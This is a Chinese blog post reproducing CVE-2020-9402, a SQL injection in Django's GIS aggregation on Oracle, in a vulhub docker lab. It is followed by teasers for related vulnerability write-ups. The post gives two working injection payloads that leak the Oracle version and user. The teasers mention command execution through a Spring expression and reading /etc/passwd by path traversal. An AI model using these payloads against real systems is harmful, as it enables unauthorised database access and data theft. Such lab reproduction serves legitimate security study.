Django-CVE-2020-9402 复现

已于 2024-05-17 11:07:51 修改
阅读量390 收藏 6
点赞数 4
分类专栏: 漏洞复现 文章标签: 学习
于 2024-05-17 11:06:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60567444/article/details/138997681
版权

1.简介django

Django是用Python开发的一个免费开源的Web框架,提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部分。并且囊括的Web应用部分可以用于快速搭建高性能、优雅的网站。

2.漏洞介绍

在GIS 查询功能中存在的SQL注入漏洞,使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句

Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞

3.复现过程

3.1 开启环境

使用的是vulhub+docker,拉取镜像

docker-compose up -d

3.2访问

8000端口打开界面如下图所示,表示搭建成功

3.3漏洞利用

访问路径不对,提示有admin、vuln、vuln23个页面,存在漏洞的是vuln、vuln2

payload1:

/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1

payload2:

q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--

oracles数据库注入方式:

参考大大:

网络安全进阶学习第十五课——Oracle SQL注入-CSDN博客

4.关闭环境

docker-compose down

我不懂e
关注
专栏目录
CVE-2020-9402 —— Django GIS SQL注入漏洞
战神/calmness的博客
12-11 471
介绍 DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。 SQL注入过程: ...
Django CVE-2018-14574
Debris丶的博客
12-21 1739
Django CVE-2018-14574 版本说明 开发环境使用的Python版本为Python3.5.1,使用的Django版本为Django2.0。 注意:打开Django2.0官网,可以发现其上方提示Django2.0是一个不安全的版本(这是发甚了什么事)。 去Vulhub一搜,果然有Django2.0版本的漏洞,编号为CVE-2018-14574: 涉及到的版本为:Django1.11.15之前的1.11.x版本以及Django2.0.8之前的Django2.0.x版本。 有漏洞的组件是Dja
17 - vulhub - Django GIS SQL注入漏洞(CVE-2024-9402
fdsgdsgdfw的博客
03-23 844
Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)2、用户在oracle的数据库且可控tolerance查询时的键名。
17 - vulhub - Django GIS SQL注入漏洞(CVE-2020-9402
最新发布
2401_86638845的博客
09-04 381
漏洞名称:Django GIS SQL注入漏洞(CVE-2020-9402)简介:DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。
Django GIS SQL注入漏洞(CVE-2020-9402
Zeker62的博客
08-25 271
什么是Django Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于DjangoDjango 是一个开放源代码的 Web 应用框架,由 Python 写成。 漏洞复现 该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。 https://git...
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 884
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
Django坑了我大半天的时间---CVE-2018-14574复现
qq_43571759的博客
04-20 487
Django < 2.0.8 任意URL跳转漏洞(CVE-2018-14574) 漏洞分析 Django是一个开放源代码的Web应用框架,由Python写成。 在其默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中,(由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLA...
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
xiaoheizi的博客
07-16 457
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。
Django1.11.4 XSS漏洞复现CVE-2017-12794)
m0_63699746的博客
07-20 312
Django是重量级选手中最有代表性的一位。首先定义了dj错误类型数组,以及获取了db的错误类型,判断出现错误类型是否在db的错误类型中,如果存在,则将dj.exc.value.__cause__=exc.value (图上没有可能是因为在1.11.5版本下),直接将错误的值传给__cause__,而在500页面中会输出__cause__的值。docker启动vluhub中的CVE-2017-12794的漏洞环境。新版本1.11.5,修复了1.11.4中500页面中可能存在的一个XSS漏洞。
Django debug page XSS漏洞(CVE-2017-12794)漏洞复现
huayimy的博客
05-11 444
Django debug page XSS漏洞(CVE-2017-12794)漏洞复现
Django SQL 注入漏洞 (CVE-2022-28346) 复现
RestoreJustice的博客
03-16 636
Django 是用 Python 开发的一个免费开源的 Web 框架,几乎囊括了 Web 应用的方方面面,可以用于快速搭建高性能、优雅的网站,Django 提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部分。
Django SQL注入漏洞(CVE-2020-7471) 复现
weixin_47531489的博客
07-19 781
1 简介 Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于DjangoDjango 是一个开放源代码的 Web 应用框架,由 Python 写成。Django 遵守 BSD 版权,初次发布于 2005 年 7 月, 并于 2008 年 9 月发布了第一个正式版本 1.0 。Django 采用了 MVT 的软件设计模式,即模型(Model),视图(View)和模板(Template)。 2 漏洞概述 2020年2月3日,Django
vulhub复现djangoCVE-2019-14234、CVE-2020-9402
小城的博客
12-03 1192
vulhub复现djangoCVE-2019-14234、CVE-2020-9402CVE-2018-14574、CVE-2017-12794)背景小故事django的漏洞概述CVE-2019-14234漏洞复现漏洞修复CVE-2020-9402漏洞复现修复建议 背景小故事 公司的人一个个的都去云南参加等保测评考试,剩下我一个小扑街孤苦伶仃地在公司学习,惨的一批(我也想去云南地说) 没办法,自己搭了个vulhub玩玩,学习学习cve漏洞复现 django的漏洞概述 Django通常搭配postgres
sql注入,利用漏洞django-cve_2019_14234
m0_65385236的博客
05-13 262
1、JSONField简介   Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点。在Django中也支持了Postgresql的数据类型: JSONField Arr
Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402
weixin_56537388的博客
11-24 727
Django2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值